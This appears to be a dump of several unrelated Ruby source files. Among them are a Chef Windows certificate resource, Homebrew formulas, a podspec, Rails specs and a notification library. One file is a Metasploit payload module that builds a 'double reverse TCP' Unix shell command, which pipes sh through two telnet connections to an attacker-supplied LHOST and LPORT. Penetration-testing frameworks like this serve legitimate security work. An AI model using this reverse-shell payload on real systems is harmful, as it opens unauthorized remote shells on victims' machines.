base.send :field, :fetched_at, :Time
end
module ClassMethods
def deq
self.find_and_modify({:state => NEW}, {:state => PROCESSED})
end
def enq(attrs)
self.create(attrs) unless self.exists?(:url => attrs[:url].to_s)
end
def queue_empty?
self.count(:state => NEW) == 0
end
end
module InstanceMethods
def enq
self.save unless self.class.exists?(:url => url)
end
def processed
self.class.update({:_id => _id}, {:state => PROCESSED})
end
def processed?
state == PROCESSED
end
end
end
end
| 19.977778 | 72 | 0.575083 |
ab1494300cbc74aafdf21498df8b7474132a7b19 | 1,395 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 130
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Double Reverse TCP (telnet)',
'Description' => 'Creates an interactive shell through two inbound connections',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcpDouble,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'telnet',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
vprint_good(command_string)
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd =
"sh -c '(sleep #{3600+rand(1024)}|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
" >/dev/null 2>&1 &)'"
return cmd
end
end
| 25.363636 | 88 | 0.564875 |
79abfa4c196d6ac3e70d520e58b437299b70cd37 | 23,700 | #
# Author:: Richard Lavey ([email protected])
#
# Copyright:: 2015-2017, Calastone Ltd.
# Copyright:: Copyright (c) Chef Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../util/path_helper"
require_relative "../resource"
require_relative "../exceptions"
module Win32
autoload :Certstore, "win32-certstore" if Chef::Platform.windows?
end
autoload :OpenSSL, "openssl"
require "chef-utils/dist" unless defined?(ChefUtils::Dist)
class Chef
class Resource
class WindowsCertificate < Chef::Resource
provides :windows_certificate
description "Use the **windows_certificate** resource to install a certificate into the Windows certificate store from a file. The resource grants read-only access to the private key for designated accounts. Due to current limitations in WinRM, installing certificates remotely may not work if the operation requires a user profile. Operations on the local machine store should still work."
introduced "14.7"
examples <<~DOC
**Add PFX cert to local machine personal store and grant accounts read-only access to private key**
```ruby
windows_certificate 'c:/test/mycert.pfx' do
pfx_password 'password'
private_key_acl ["acme\\fred", "pc\\jane"]
end
```
**Add cert to trusted intermediate store**
```ruby
windows_certificate 'c:/test/mycert.cer' do
store_name 'CA'
end
```
**Remove all certificates matching the subject**
```ruby
windows_certificate 'me.acme.com' do
action :delete
end
```
DOC
property :source, String,
description: "The source file (for `create` and `acl_add`), thumbprint (for `delete`, `export`, and `acl_add`), or subject (for `delete` or `export`) if it differs from the resource block's name.",
name_property: true
property :pfx_password, String,
description: "The password to access the object with if it is a PFX file."
property :private_key_acl, Array,
description: "An array of 'domain\\account' entries to be granted read-only access to the certificate's private key. Not idempotent."
property :store_name, String,
description: "The certificate store to manipulate.",
default: "MY", equal_to: ["TRUSTEDPUBLISHER", "TrustedPublisher", "CLIENTAUTHISSUER", "REMOTE DESKTOP", "ROOT", "TRUSTEDDEVICES", "WEBHOSTING", "CA", "AUTHROOT", "TRUSTEDPEOPLE", "MY", "SMARTCARDROOT", "TRUST", "DISALLOWED"]
property :user_store, [TrueClass, FalseClass],
description: "Use the `CurrentUser` store instead of the default `LocalMachine` store. Note: Prior to #{ChefUtils::Dist::Infra::CLIENT}. 16.10 this property was ignored.",
default: false
deprecated_property_alias :cert_path, :output_path, "The cert_path property was renamed output_path in the 17.0 release of #{ChefUtils::Dist::Infra::CLIENT}. Please update your cookbooks to use the new property name."
# lazy used to set default value of sensitive to true if password is set
property :sensitive, [TrueClass, FalseClass],
description: "Ensure that sensitive resource data is not logged by the #{ChefUtils::Dist::Infra::CLIENT}.",
default: lazy { pfx_password ? true : false }, skip_docs: true
property :exportable, [TrueClass, FalseClass],
description: "Ensure that imported pfx certificate is exportable. Please provide 'true' if you want the certificate to be exportable.",
default: false,
introduced: "16.8"
property :output_path, String,
description: "A path on the node where a certificate object (PFX, PEM, CER, KEY, etc) can be exported to.",
introduced: "17.0"
action :create, description: "Creates or updates a certificate." do
ext = get_file_extension(new_resource.source)
# PFX certificates contains private keys and we import them with some other approach
# import_certificates(fetch_cert_object(ext), (ext == ".pfx"))
import_certificates(fetch_cert_object_from_file(ext), (ext == ".pfx"))
end
# acl_add is a modify-if-exists operation : not idempotent
action :acl_add, description: "Adds read-only entries to a certificate's private key ACL." do
if ::File.exist?(new_resource.source)
hash = "$cert.GetCertHashString()"
code_script = cert_script(false)
guard_script = cert_script(false)
else
# make sure we have no spaces in the hash string
hash = "\"#{new_resource.source.gsub(/\s/, "")}\""
code_script = ""
guard_script = ""
end
code_script << acl_script(hash)
guard_script << cert_exists_script(hash)
powershell_script "setting the acls on #{new_resource.source} in #{ps_cert_location}\\#{new_resource.store_name}" do
convert_boolean_return true
code code_script
only_if guard_script
sensitive if new_resource.sensitive
end
end
action :delete, description: "Deletes a certificate." do
cert_is_valid = verify_cert
if cert_is_valid == true
converge_by("Deleting certificate #{new_resource.source} from Store #{new_resource.store_name}") do
delete_cert
end
else
Chef::Log.debug("Certificate Not Found")
end
end
action :fetch, description: "Fetches a certificate." do
unless new_resource.output_path
raise Chef::Exceptions::ResourceNotFound, "You must include an output_path parameter when calling the fetch action"
end
if ::File.extname(new_resource.output_path) == ".pfx"
validated_thumbprint = validate_thumbprint(new_resource.source)
if validated_thumbprint != false # is the thumbprint valid
cert_obj = powershell_exec!(pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: ps_cert_location, store_name: new_resource.store_name, output_path: new_resource.output_path, password: new_resource.pfx_password ))
else
message = "While fetching the certificate, was passed the following invalid certificate thumbprint : #{new_resource.source}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
else
cert_obj = fetch_cert
end
if cert_obj != false && cert_obj != "Certificate Not Found"
converge_by("Fetching certificate #{new_resource.source} from Store \\#{ps_cert_location}\\#{new_resource.store_name}") do
export_cert(cert_obj, output_path: new_resource.output_path, store_name: new_resource.store_name , store_location: ps_cert_location, pfx_password: new_resource.pfx_password)
end
else
Chef::Log.debug("Certificate Not Found")
end
end
action :verify, description: "Verifies a certificate and logs the result." do
out = verify_cert
if !!out == out
out = out ? "Certificate is valid" : "Certificate not valid"
end
Chef::Log.info(out.to_s)
end
action_class do
@local_pfx_path = ""
CERT_SYSTEM_STORE_LOCAL_MACHINE = 0x00020000
CERT_SYSTEM_STORE_CURRENT_USER = 0x00010000
def add_cert(cert_obj)
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.add(cert_obj)
end
def add_pfx_cert(path)
exportable = new_resource.exportable ? 1 : 0
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.add_pfx(path, new_resource.pfx_password, exportable)
end
def delete_cert
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.delete(validate_thumbprint(new_resource.source))
end
def fetch_cert
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
if new_resource.output_path && ::File.extname(new_resource.output_path) == ".key"
fetch_key
else
store.get(validate_thumbprint(new_resource.source))
end
end
def fetch_key
require "openssl" unless defined?(OpenSSL)
file_name = ::File.basename(new_resource.output_path, ::File.extname(new_resource.output_path))
pfx_file = file_name + ".pfx"
new_pfx_output_path = ::File.join(Chef::FileCache.create_cache_path("pfx_files"), pfx_file)
powershell_exec(pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: ps_cert_location, store_name: new_resource.store_name, output_path: new_pfx_output_path, password: new_resource.pfx_password ))
pkcs12 = OpenSSL::PKCS12.new(::File.binread(new_pfx_output_path), new_resource.pfx_password)
f = ::File.open(new_resource.output_path, "w")
f.write(pkcs12.key.to_s)
f.flush
f.close
end
def get_file_extension(file_name)
if is_file?(file_name)
::File.extname(file_name)
elsif is_url?(file_name)
require "open-uri" unless defined?(OpenURI)
uri = URI.parse(file_name)
output_file = ::File.basename(uri.path)
::File.extname(output_file)
end
end
def get_file_name(path_name)
if is_file?(path_name)
::File.extname(path_name)
elsif is_url?(path_name)
require "open-uri" unless defined?(OpenURI)
uri = URI.parse(path_name)
::File.basename(uri.path)
end
end
def is_url?(source)
require "uri" unless defined?(URI)
uri = URI.parse(source)
uri.is_a?(URI::HTTP) || uri.is_a?(URI::HTTPS)
end
def is_file?(source)
::File.file?(source)
end
# Thumbprints should be exactly 40 Hex characters
def valid_thumbprint?(string)
string.match?(/[0-9A-Fa-f]/) && string.length == 40
end
def get_thumbprint(store_name, location, source)
<<-GETTHUMBPRINTCODE
$content = Get-ChildItem -Path Cert:\\#{location}\\#{store_name} | Where-Object {$_.Subject -Match "#{source}"} | Select-Object Thumbprint
$content.thumbprint
GETTHUMBPRINTCODE
end
def validate_thumbprint(thumbprint)
# valid_thumbprint can return false under at least 2 conditions:
# one is that the thumbprint is in fact busted
# the second is that the thumbprint is valid but belongs to an expired certificate already installed
results = valid_thumbprint?(thumbprint)
results == true ? thumbprint : false
end
# Checks to make sure whether the cert is found or not
# if it IS found, is it still valid - has it expired?
def verify_cert(thumbprint = new_resource.source)
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
validated_thumbprint = validate_thumbprint(thumbprint)
if validated_thumbprint != false
result = store.valid?(thumbprint)
result == ( "Certificate Not Found" || "Certificate Has Expired" ) ? false : true
else
message = "While verifying the certificate, was passed the following invalid certificate thumbprint : #{thumbprint}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
end
# this structure is solving 2 problems. The first is that we need to have support for both the CurrentUser AND LocalMachine stores
# Secondly, we need to pass the proper constant name for each store to win32-certstore but also pass the short name to powershell scripts used here
def ps_cert_location
new_resource.user_store ? "CurrentUser" : "LocalMachine"
end
def pfx_ps_cmd(thumbprint, store_location: "LocalMachine", store_name: "My", output_path:, password: )
<<-CMD
$my_pwd = ConvertTo-SecureString -String "#{password}" -Force -AsPlainText
$cert = Get-ChildItem -path cert:\\#{store_location}\\#{store_name} -Recurse | Where { $_.Thumbprint -eq "#{thumbprint.upcase}" }
Export-PfxCertificate -Cert $cert -FilePath "#{output_path}" -Password $my_pwd
CMD
end
def native_cert_location
new_resource.user_store ? CERT_SYSTEM_STORE_CURRENT_USER : CERT_SYSTEM_STORE_LOCAL_MACHINE
end
def cert_script(persist)
cert_script = "$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2"
file = Chef::Util::PathHelper.cleanpath(new_resource.source, ps_cert_location)
cert_script << " \"#{file}\""
if ::File.extname(file.downcase) == ".pfx"
cert_script << ", \"#{new_resource.pfx_password}\""
if persist && new_resource.user_store
cert_script << ", ([System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)"
elsif persist
cert_script << ", ([System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet -bor [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::MachineKeyset)"
end
end
cert_script << "\n"
end
def cert_exists_script(hash)
<<-EOH
$hash = #{hash}
Test-Path "Cert:\\#{ps_cert_location}\\#{new_resource.store_name}\\$hash"
EOH
end
def within_store_script
inner_script = yield "$store"
<<-EOH
$store = New-Object System.Security.Cryptography.X509Certificates.X509Store "#{new_resource.store_name}", ([System.Security.Cryptography.X509Certificates.StoreLocation]::#{ps_cert_location})
$store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
#{inner_script}
$store.Close()
EOH
end
def acl_script(hash)
return "" if new_resource.private_key_acl.nil? || new_resource.private_key_acl.empty?
# this PS came from http://blogs.technet.com/b/operationsguy/archive/2010/11/29/provide-access-to-private-keys-commandline-vs-powershell.aspx
# and from https://msdn.microsoft.com/en-us/library/windows/desktop/bb204778(v=vs.85).aspx
set_acl_script = <<-EOH
$hash = #{hash}
$storeCert = Get-ChildItem "cert:\\#{ps_cert_location}\\#{new_resource.store_name}\\$hash"
if ($storeCert -eq $null) { throw 'no key exists.' }
$keyname = $storeCert.PrivateKey.CspKeyContainerInfo.UniqueKeyContainerName
if ($keyname -eq $null) { throw 'no private key exists.' }
if ($storeCert.PrivateKey.CspKeyContainerInfo.MachineKeyStore)
{
$fullpath = "$Env:ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\$keyname"
}
else
{
$currentUser = New-Object System.Security.Principal.NTAccount($Env:UserDomain, $Env:UserName)
$userSID = $currentUser.Translate([System.Security.Principal.SecurityIdentifier]).Value
$fullpath = "$Env:ProgramData\\Microsoft\\Crypto\\RSA\\$userSID\\$keyname"
}
EOH
new_resource.private_key_acl.each do |name|
set_acl_script << "$uname='#{name}'; icacls $fullpath /grant $uname`:RX\n"
end
set_acl_script
end
# Method returns an OpenSSL::X509::Certificate object. Might also return multiple certificates if present in certificate path
#
# Based on its extension, the certificate contents are used to initialize
# PKCS12 (PFX), PKCS7 (P7B) objects which contains OpenSSL::X509::Certificate.
#
# @note Other then PEM, all the certificates are usually in binary format, and hence
# their contents are loaded by using File.binread
#
# @param ext [String] Extension of the certificate
#
# @return [OpenSSL::X509::Certificate] Object containing certificate's attributes
#
# @raise [OpenSSL::PKCS12::PKCS12Error] When incorrect password is provided for PFX certificate
#
def fetch_cert_object_from_file(ext)
if is_file?(new_resource.source)
begin
::File.exist?(new_resource.source)
contents = ::File.binread(new_resource.source)
rescue => exception
message = "Unable to load the certificate object from the specified local path : #{new_resource.source}\n"
message << exception.message
raise Chef::Exceptions::FileNotFound, message
end
elsif is_url?(new_resource.source)
require "uri" unless defined?(URI)
uri = URI(new_resource.source)
state = uri.is_a?(URI::HTTP) && !uri.host.nil? ? true : false
if state
begin
output_file_name = get_file_name(new_resource.source)
unless Dir.exist?(Chef::Config[:file_cache_path])
Dir.mkdir(Chef::Config[:file_cache_path])
end
local_path = ::File.join(Chef::Config[:file_cache_path], output_file_name)
@local_pfx_path = local_path
::File.open(local_path, "wb") do |file|
file.write URI.open(new_resource.source).read
end
rescue => exception
message = "Not Able to Download Certificate Object at the URL specified : #{new_resource.source}\n"
message << exception.message
raise Chef::Exceptions::FileNotFound, message
end
contents = ::File.binread(local_path)
else
message = "Not Able to Download Certificate Object at the URL specified : #{new_resource.source}\n"
message << exception.message
raise Chef::Exceptions::InvalidRemoteFileURI, message
end
else
message = "You passed an invalid file or url to import. Please check the spelling and try again."
message << exception.message
raise Chef::Exceptions::ArgumentError, message
end
case ext
when ".pfx"
pfx = OpenSSL::PKCS12.new(contents, new_resource.pfx_password)
if pfx.ca_certs.nil?
pfx.certificate
else
[pfx.certificate] + pfx.ca_certs
end
when ".p7b"
OpenSSL::PKCS7.new(contents).certificates
else
OpenSSL::X509::Certificate.new(contents)
end
end
def export_cert(cert_obj, output_path:, store_name:, store_location:, pfx_password:)
# Delete the cert if it exists on disk already.
# We want to ensure we're not randomly loading an old stinky cert.
if ::File.exists?(output_path)
::File.delete(output_path)
end
unless ::File.directory?(::File.dirname(output_path))
FileUtils.mkdir_p(::File.dirname(output_path))
end
out_file = ::File.new(output_path, "w+")
case ::File.extname(output_path)
when ".pem"
out_file.puts(cert_obj)
when ".der"
out_file.puts(cert_obj.to_der)
when ".cer"
cert_out = shell_out("openssl x509 -text -inform DER -in #{cert_obj.to_pem} -outform CER").stdout
out_file.puts(cert_out)
when ".crt"
cert_out = shell_out("openssl x509 -text -inform DER -in #{cert_obj} -outform CRT").stdout
out_file.puts(cert_out)
when ".pfx"
validated_thumbprint = validate_thumbprint(new_resource.source)
if validated_thumbprint != false # is the thumbprint valid
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
result = store.valid?(new_resource.source) # is there a cert in the store matching that thumbprint
temp = result == ( "Certificate Not Found" || "Certificate Has Expired" ) ? false : true
if temp == true
pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: store_location, store_name: store_name, output_path: output_path, password: pfx_password )
else
Chef::Log.debug("The requested certificate is not found or has expired")
end
else
message = "While exporting the pfx, was passed the following invalid certificate thumbprint : #{new_resource.source}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
when ".p7b"
cert_out = shell_out("openssl pkcs7 -export -nokeys -in #{cert_obj.to_pem} -outform P7B").stdout
out_file.puts(cert_out)
when ".key"
out_file.puts(cert_obj)
else
Chef::Log.info("Supported certificate format .pem, .der, .cer, .crt, and .p7b")
end
out_file.close
end
# Imports the certificate object into cert store
#
# @param cert_objs [OpenSSL::X509::Certificate] Object containing certificate's attributes
#
# @param is_pfx [Boolean] true if we want to import a PFX certificate
#
def import_certificates(cert_objs, is_pfx, store_name: new_resource.store_name, store_location: native_cert_location)
[cert_objs].flatten.each do |cert_obj|
thumbprint = OpenSSL::Digest.new("SHA1", cert_obj.to_der).to_s
if verify_cert(thumbprint) == true
Chef::Log.debug("Certificate is already present")
elsif verify_cert(thumbprint) == false # Not found already in the CertStore
if is_pfx
if is_file?(new_resource.source)
converge_by("Creating a PFX #{new_resource.source} for Store #{new_resource.store_name}") do
add_pfx_cert(new_resource.source)
end
elsif is_url?(new_resource.source)
converge_by("Creating a PFX #{@local_pfx_path} for Store #{new_resource.store_name}") do
add_pfx_cert(@local_pfx_path)
end
else
message = "You passed an invalid file or url to import. Please check the spelling and try again."
message << exception.message
raise Chef::Exceptions::ArgumentError, message
end
else
converge_by("Creating a certificate #{new_resource.source} for Store #{new_resource.store_name}") do
add_cert(cert_obj)
end
end
else
message = "Certificate could not be imported"
raise Chef::Exceptions::CertificateNotImportable, message
end
end
end
end
end
end
end
| 44.548872 | 396 | 0.639873 |
87572e12171228407dde31d3db9c473427c02b6f | 7,885 | module ActivityNotification
# Manages to add all required configurations to target models of notification.
module ActsAsTarget
extend ActiveSupport::Concern
class_methods do
# Adds required configurations to notifiable models.
#
# == Parameters:
# * :email
# * Email address to send notification email.
# This is a necessary option when you enables email notification.
# @example Simply use :email field
# # app/models/user.rb
# class User < ActiveRecord::Base
# validates :email, presence: true
# acts_as_target email: :email
# end
#
# * :email_allowed
# * Whether activity_notification sends notification email to this target.
# Specified method or symbol is expected to return true (not nil) or false (nil).
# This parameter is a optional since default value is false.
# To use notification email, email_allowed option must return true (not nil) in both of notifiable and target model.
# This can be also configured default option in initializer.
# @example Always enable email notification for this target
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target email: :email, email_allowed: true
# end
# @example Use confirmed_at of devise field to decide whether activity_notification sends notification email to this user
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# * :devise_resource
# * Integrated resource with devise authentication.
# This parameter is a optional since `self` is used as default value.
# You also have to configure routing for devise in routes.rb
# @example No :devise_resource is needed when notification target is the same as authenticated resource
# # config/routes.rb
# devise_for :users
# notify_to :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# @example Send Admin model and use associated User model with devise authentication
# # config/routes.rb
# devise_for :users
# notify_to :admins, with_devise: :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# end
#
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# belongs_to :user
# validates :user, presence: true
# acts_as_notification_target email: :email,
# email_allowed: ->(admin, key) { admin.user.confirmed_at.present? },
# devise_resource: :user
# end
#
# * :current_devise_target
# * Current authenticated target by devise authentication.
# This parameter is a optional since `current_<devise_resource_name>` is used as default value.
# In addition, this parameter is only needed when :devise_default_route in your route.rb is enabled.
# You also have to configure routing for devise in routes.rb
# @example No :current_devise_target is needed when notification target is the same as authenticated resource
# # config/routes.rb
# devise_for :users
# notify_to :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# @example Send Admin model and use associated User model with devise authentication
# # config/routes.rb
# devise_for :users
# notify_to :admins, with_devise: :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# end
#
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# belongs_to :user
# validates :user, presence: true
# acts_as_notification_target email: :email,
# email_allowed: ->(admin, key) { admin.user.confirmed_at.present? },
# devise_resource: :user,
# current_devise_target: ->(current_user) { current_user.admin }
# end
#
# * :printable_name or :printable_notification_target_name
# * Printable notification target name.
# This parameter is a optional since `ActivityNotification::Common.printable_name` is used as default value.
# :printable_name is the same option as :printable_notification_target_name
# @example Define printable name with user name of name field
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target printable_name: :name
# end
#
# @example Define printable name with associated user name
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# acts_as_target printable_notification_target_name: ->(admin) { "admin (#{admin.user.name})" }
# end
#
# @param [Hash] options Options for notifiable model configuration
# @option options [Symbol, Proc, String] :email (nil) Email address to send notification email
# @option options [Symbol, Proc, Boolean] :email_allowed (ActivityNotification.config.email_enabled) Whether activity_notification sends notification email to this target
# @option options [Symbol, Proc, Boolean] :batch_email_allowed (ActivityNotification.config.email_enabled) Whether activity_notification sends batch notification email to this target
# @option options [Symbol, Proc, Boolean] :subscription_allowed (ActivityNotification.config.subscription_enabled) Whether activity_notification manages subscriptions of this target
# @option options [Symbol, Proc, Object] :devise_resource (->(model) { model }) Integrated resource with devise authentication
# @option options [Symbol, Proc, Object] :current_devise_target (->(current_resource) { current_resource }) Current authenticated target by devise authentication
# @option options [Symbol, Proc, String] :printable_name (ActivityNotification::Common.printable_name) Printable notification target name
# @return [Hash] Configured parameters as target model
def acts_as_target(options = {})
include Target
options[:printable_notification_target_name] ||= options.delete(:printable_name)
options[:batch_notification_email_allowed] ||= options.delete(:batch_email_allowed)
acts_as_params = set_acts_as_parameters([:email, :email_allowed, :subscription_allowed, :devise_resource, :current_devise_target], options, "notification_")
.merge set_acts_as_parameters([:batch_notification_email_allowed, :printable_notification_target_name], options)
include Subscriber if subscription_enabled?
acts_as_params
end
alias_method :acts_as_notification_target, :acts_as_target
# Returns array of available target options in acts_as_target.
# @return [Array<Symbol>] Array of available target options
def available_target_options
[:email, :email_allowed, :batch_email_allowed, :subscription_allowed, :devise_resource, :printable_notification_target_name, :printable_name].freeze
end
end
end
end
| 51.875 | 197 | 0.659734 |
1a9c39222ab9ec06ef505d1178e2d3dbcb412647 | 197 | json.array!(@tournaments) do |tournament|
json.extract! tournament, :id, :fecha_inicio, :fecha_termino, :puntos_minimo, :jugadores_maximo
json.url tournament_url(tournament, format: :json)
end
| 39.4 | 97 | 0.77665 |
bb50941a504d370950b9e0c1cb620b68c39eaa47 | 1,065 | Pod::Spec.new do |s|
s.name = 'KVKCalendar'
s.version = '0.3.2'
s.summary = 'A most fully customization calendar library for iOS.'
s.description = <<-DESC
KVKCalendar is a most fully customization calendar library.
Library consists of four modules for displaying various types of calendar (day, week, month, year).
You can choose any module or use all. It is designed based on a standard iOS calendar, but with additional features.
Timeline displays the schedule for the day and week.
DESC
s.homepage = 'https://github.com/kvyatkovskys/KVKCalendar'
s.license = { :type => 'MIT', :file => 'LICENSE.md' }
s.author = { 'Sergei Kviatkovskii' => '[email protected]' }
s.source = { :git => 'https://github.com/kvyatkovskys/KVKCalendar.git', :tag => s.version.to_s }
s.social_media_url = 'https://github.com/kvyatkovskys'
s.ios.deployment_target = '10.0'
s.source_files = 'KVKCalendar/Classes/*.swift'
s.swift_version = '5.0'
end
| 48.409091 | 118 | 0.647887 |
626137775a2c131251db07c76c09496fd8353feb | 889 | class Rpg < Formula
desc "Ruby package management for UNIX"
homepage "https://github.com/rtomayko/rpg"
url "https://github.com/downloads/rtomayko/rpg/rpg-0.3.0.tar.gz"
sha256 "c350f64744fb602956a91a57c8920e69058ea42e4e36b0e74368e96954d9d0c7"
head "https://github.com/rtomayko/rpg.git"
bottle do
cellar :any_skip_relocation
sha256 "be6550c915e361dcc0e020048f9a5f4ea37f1c5890a526282a3d70c610594981" => :el_capitan
sha256 "5c1af29955697dcd46ff58fd70f9aca986b977f3cc17f638822c81289f180df2" => :yosemite
sha256 "2ebf1a744c3c072c107883f565c04154b3e530c93868bb438bb90a1be35a4cb7" => :mavericks
sha256 "d32135e52bef3d16d6538dd8050cef4e1081474cc1156462a900ab2afa28b448" => :mountain_lion
end
def install
system "./configure", "--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
system "#{bin}/rpg", "config"
end
end
| 32.925926 | 95 | 0.768279 |
f70f3720651343c7167fb5fece969a542a881aae | 1,588 | class Bastet < Formula
desc "Bastard Tetris"
homepage "https://fph.altervista.org/prog/bastet.html"
url "https://github.com/fph/bastet/archive/0.43.2.tar.gz"
sha256 "f219510afc1d83e4651fbffd5921b1e0b926d5311da4f8fa7df103dc7f2c403f"
bottle do
rebuild 1
sha256 "0dfeabb0071431e426ac18b366ff5d065067075e7d3f4572e55a281e6702e215" => :catalina
sha256 "d1315f05616c060c8b5e83a9ae494f2ffecd2f78d53ef554192bb0e12ef451ef" => :mojave
sha256 "188658452934d4ef5d48d6837fb0c6bf3e3875488e0c1da8dcf62ca37c1ee998" => :high_sierra
sha256 "8133c13d1b98d96eacf5d420d30378fbfcd9cbe898b0f13b188112618f4338f5" => :sierra
sha256 "e3745b716c09ce7f3834f4fc30163fa132f93feeec4c301dc9d46b0bc9ca564f" => :el_capitan
sha256 "254d21cc32a309c4b91ba5008fdfe56dbd355312948de849e2172fbf2201ab83" => :x86_64_linux
end
depends_on "boost"
# Fix compilation with Boost >= 1.65, remove for next release
patch do
url "https://github.com/fph/bastet/commit/0e03f8d4.patch?full_index=1"
sha256 "9b937d070a4faf150f60f82ace790c7a1119cff0685b52edf579740d2c415d7b"
end
def install
inreplace %w[Config.cpp bastet.6], "/var", var
system "make", "all"
# this must exist for games to be saved globally
(var/"games").mkpath
touch "#{var}/games/bastet.scores2"
bin.install "bastet"
man6.install "bastet.6"
end
test do
pid = fork do
exec bin/"bastet"
end
sleep 3
assert_predicate bin/"bastet", :exist?
assert_predicate bin/"bastet", :executable?
ensure
Process.kill("TERM", pid)
Process.wait(pid)
end
end
| 31.137255 | 94 | 0.752519 |
e81486eeccf882d5c927ca6d8fd88c5c008efbab | 1,654 | require "spec_helper"
describe ActiveModel::Validations::SizeValidator do
context "validates that the attribute has a maximum number of values" do
class TestJsonSize < HarvesterCore::Json::Base
attribute :landing_url, path: "landing_url"
validates :landing_url, size: { maximum: 2 }
end
it "should be valid when it has one value" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1"]})
record.set_attribute_values
record.valid?.should be_true
end
it "should not be valid when it has more than the maximum" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1", "http://google.com/2", "http://google.com/3"]})
record.set_attribute_values
record.valid?.should be_false
end
end
context "validates that the attribute has the exact number of values" do
class TestJsonSize < HarvesterCore::Json::Base
attribute :landing_url, path: "landing_url"
validates :landing_url, size: { is: 1 }
end
it "should be valid when it has one value" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1"]})
record.set_attribute_values
record.valid?.should be_true
end
it "should not be valid when it has 0 values" do
record = TestJsonSize.new({"landing_url" => []})
record.set_attribute_values
record.valid?.should be_false
end
it "should not be valid when it has 2 values" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1", "http://google.com/2"]})
record.set_attribute_values
record.valid?.should be_false
end
end
end
| 33.08 | 121 | 0.673519 |
117f48450e2a78bbcc9b2791836c728f27954b8b | 6,363 | require 'spec_helper'
describe 'projects/jobs/show' do
let(:project) { create(:project, :repository) }
let(:build) { create(:ci_build, pipeline: pipeline) }
let(:pipeline) do
create(:ci_pipeline, project: project, sha: project.commit.id)
end
before do
assign(:build, build.present)
assign(:project, project)
allow(view).to receive(:can?).and_return(true)
end
describe 'environment info in job view' do
context 'job with latest deployment' do
let(:build) do
create(:ci_build, :success, environment: 'staging')
end
before do
create(:environment, name: 'staging')
create(:deployment, deployable: build)
end
it 'shows deployment message' do
expected_text = 'This job is the most recent deployment'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job with outdated deployment' do
let(:build) do
create(:ci_build, :success, environment: 'staging', pipeline: pipeline)
end
let(:second_build) do
create(:ci_build, :success, environment: 'staging', pipeline: pipeline)
end
let(:environment) do
create(:environment, name: 'staging', project: project)
end
let!(:first_deployment) do
create(:deployment, environment: environment, deployable: build)
end
let!(:second_deployment) do
create(:deployment, environment: environment, deployable: second_build)
end
it 'shows deployment message' do
expected_text = 'This job is an out-of-date deployment ' \
"to staging.\nView the most recent deployment ##{second_deployment.iid}."
render
expect(rendered).to have_css('.environment-information', text: expected_text)
end
end
context 'job failed to deploy' do
let(:build) do
create(:ci_build, :failed, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'The deployment of this job to staging did not succeed.'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job will deploy' do
let(:build) do
create(:ci_build, :running, environment: 'staging', pipeline: pipeline)
end
context 'when environment exists' do
let!(:environment) do
create(:environment, name: 'staging', project: project)
